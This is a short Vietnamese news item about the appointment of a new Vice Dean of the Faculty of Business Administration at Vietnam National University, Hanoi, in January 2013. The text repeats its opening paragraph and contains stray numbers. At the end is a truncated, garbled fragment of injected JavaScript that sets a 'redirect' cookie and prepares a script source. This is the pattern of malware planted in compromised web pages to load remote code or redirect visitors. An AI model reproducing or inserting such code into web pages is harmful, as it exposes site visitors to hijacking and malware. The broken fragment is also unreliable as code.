Bổ nhiệm tân Phó Chủ nhiệm Khoa Quản trị Kinh doanh, ĐHQGHN

16Ngày 21/1/2013, PGS.TS Phùng Xuân Nhạ – Ủy viên Dự khuyết BCH T.Ư Đảng, Phó Giám đốc thường trực ĐHQGHN đã đến dự Lễ trao quyết định bổ nhiệm tân Phó Chủ nhiệm Khoa Quản trị Kinh doanh cho PGS.TS Hoàng Đình Phi.

 

Ngày 21/1/2013, PGS.TS Phùng Xuân Nhạ – Ủy viên Dự khuyết BCH T.Ư Đảng, Phó Giám đốc thường trực ĐHQGHN đã đến dự Lễ trao quyết định bổ nhiệm tân Phó Chủ nhiệm Khoa Quản trị Kinh doanh cho PGS.TS Hoàng Đình Phi.

Phát biểu tại buổi lễ, PGS.TS Phùng Xuân Nhạ yêu cầu, PGS.TS Hoàng Đình Phi cần nhanh chóng tiếp quản những thông tin, vấn đề của khoa để xây dựng những kế hoạch, chiến lược phát triển phù hợp. Khoa có trách nhiệm tạo ra các sản phẩm mới mang bản sắc của ĐHQGHN và bản sắc riêng của mình.

Chính vì vậy, PGS.TS Phùng Xuân Nhạ chỉ đạo Khoa Quản trị Kinh doanh cần quy tụ được đội ngũ cán bộ, giảng viên trong và ngoài Khoa để thực hiện ý tưởng và phát huy thế mạnh của mình.

15
PGS.TS Hoàng Đình Phi bày tỏ lòng cảm ơn chân thành nhất tới lãnh đạo ĐHQGHN cũng như lãnh đạo và toàn thể cán bộ Khoa. Tân Phó Chủ nhiệm Khoa cũng cam kết sẽ cố gắng cùng xây dựng kế hoạch và chiến lược phát triển Khoa, xứng đáng với nhiệm vụ được giao.

16

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’